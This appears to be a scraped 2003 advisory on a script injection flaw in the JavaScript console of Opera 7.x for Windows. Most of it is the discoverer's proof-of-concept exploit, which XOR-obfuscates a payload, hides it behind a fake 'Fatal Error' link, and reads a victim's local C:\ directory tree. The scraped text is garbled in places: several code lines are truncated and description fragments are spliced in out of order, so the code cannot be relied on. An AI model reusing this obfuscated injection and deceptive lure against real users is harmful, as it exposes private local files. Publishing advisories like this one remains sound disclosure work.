Reported
April 28, 2003, by nesumin.
VERSIONS
AFFECTED
Opera for Windows 7.10
(build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b),
7.01 (build 2651)
DESCRIPTION
DEMONSTRATION
The
discoverer posted the following code as proof of concept:
==============
This code generates
a link on the JavaScript console
to read directory
list from local disk "C:\" and display it.
\[1\] replace the
"script" instead of "Xploit" and save as html file
\[2\] upload to WEB
server
\[3\] open with
Opera(enable javascript)
\[4\] click a link on
the JavaScript console
----------------------------------------------------------------
var depth = 1;
var startdir = "file://localhost/c:/";
// arbitrary
script
var evil_script="";
evil_script +=
"function dt(dp)\{\n";
evil_script += "var
i,j,tr,td,b;\n";
evil_script += "if('complete'fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0))\{\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script +=
"b+='
evil_script += "for(i=1;i
evil_script += "td
= tr.item(i).getElementsByTagName('td');\n";
evil_script += "if
(td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0
&& td.item(0).getElementsByTagName('img')";
evil_script +=
".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script +=
"ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script +=
"for (j=0;j
evil_script +=
"b+='
evil_script += "if
(0>=ds.length)return;fr.location.href=ds.pop();--dp;\}\n";
evil_script += "setTimeout('dt('+dp+');',30);\}\nvar
ds = new Array(),";
evil_script += "b
= document.getElementsByTagName('body').item(0),";
evil_script += "f
= document.createElement('iframe'),";
evil_script += "d
= document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";
// xor and
URLEncode
evil_script =
escape(evil_script.replace(/./g,function(s)\{
return(String.fromCharCode(0x80^s.charCodeAt(0)))\}));
var msg = "http://";
// fake url
msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";
// code
msg +=
"');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s)\{";
msg +=
"return(String.fromCharCode(0x80^s.charCodeAt(0)))\})+'\n";
// fake message
msg += "\n";
msg += "Fatal
Error !!!!\n\n";
msg += " Please
click above link.\n"; // :p
opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";
----------------------------------------------------------------
VENDOR
RESPONSE
CREDIT
A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. This vulnerability is a result of code in Opera 7.x's console.html file that doesn't sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.
\\n'";
\\n'+'Count : '+tr.length+'
\\n';\n";
\\n';\}tree.innerHTML+=b;\n";Opera has yet to respond to this problem.
Discovered by
nesumin.
Script Injection Vulnerability in Opera for Windows JavaScript Console
0 comments
Hide comments